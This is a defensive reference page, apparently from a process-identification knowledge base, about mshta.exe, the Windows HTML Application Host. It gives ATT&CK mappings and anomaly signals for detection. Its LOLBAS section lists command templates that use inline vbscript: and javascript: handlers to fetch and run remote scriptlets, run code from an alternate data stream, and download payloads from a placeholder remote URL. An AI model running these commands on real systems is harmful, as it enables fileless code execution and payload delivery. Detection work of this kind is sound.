Process

unknown

mshta.exe

mshta.exe is the Microsoft HTML Application Host, the program that runs HTA files. An HTA is an HTML page with embedded VBScript or JScript that runs as a standalone desktop application with full local privileges, outside the browser's sandbox. A few legacy enterprise tools still ship as HTAs, but the format now turns up far more in attacks than in normal use.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS5
  • mshta.exe {PATH:.hta}Execute · Execute code
  • mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))Execute · Execute code
  • mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();Execute · Execute code
  • mshta.exe "{PATH_ABSOLUTE}:file.hta"ADS · Execute code hidden in alternate data stream
  • mshta.exe {REMOTEURL}Download · Downloads payload from remote server

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

mshta.exe runs HTML Applications using the same Trident engine that powered Internet Explorer, but without the browser's security restrictions. Script inside an .hta runs with the privileges of the user, reaches the full file system and COM, and is trusted like any installed application. The genuine binary lives at C:\Windows\System32\mshta.exe, with a 32-bit copy under SysWOW64.

It takes an HTA to run, which can be a local file or a URL, and it can also execute inline script straight from the command line through the javascript: and vbscript: handlers. When legitimate, its parent is usually explorer.exe, a user opening an HTA, or another application launching one it bundles.

On most modern systems mshta runs rarely. What it executes is determined entirely by the HTA or inline script named on its command line.

Security notes

mshta.exe is a heavily used proxy-execution tool (T1218.005), a staple of phishing chains. The signed binary will run an HTA from a local path or a URL, executing the embedded VBScript or JScript with local trust and nothing dropped to disk (T1059.005, T1059.007). Because the binary is legitimate, path and signature checks pass. The signal is the command line and the parent, classically an Office document spawning mshta http://host/page.hta.

It is also a fileless download stage. The javascript: and vbscript: handlers let mshta run code directly from its command line, and that code routinely fetches and launches the next payload (T1105). A URL, or a javascript:/vbscript: string, in an mshta command line is almost never legitimate.

Anomaly signals7
  • Image path other than C:\Windows\System32\mshta.exe or its SysWOW64 copyhigh
  • A URL (http/https) on the command linehigh
  • javascript: or vbscript: inline on the command linehigh
  • Parent is an Office application, wscript.exe, cscript.exe, or another LOLBINhigh
  • mshta spawning cmd.exe, powershell.exe, or other LOLBINshigh
  • Loading an .hta from a user-writable path (Temp, AppData, Downloads)high
  • Outbound network connections from mshtamed

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof mshta.exe?
Edit this page on GitHub